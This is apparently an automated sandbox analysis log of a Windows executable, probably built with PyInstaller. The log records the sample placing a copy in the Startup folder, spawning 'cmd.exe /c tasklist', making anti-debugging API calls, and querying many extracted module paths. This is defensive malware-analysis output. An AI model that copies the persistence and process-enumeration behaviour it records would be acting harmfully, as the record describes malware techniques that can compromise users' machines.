Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB8021F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBBB8021F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB822126 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBBB822126

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Process created: C:\Users\user\Desktop\HyZh4pn0RF.exe "C:\Users\user\Desktop\HyZh4pn0RF.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

Code function: 0_2_00007FF78F4A9E40 cpuid

0_2_00007FF78F4A9E40

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_wmi.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
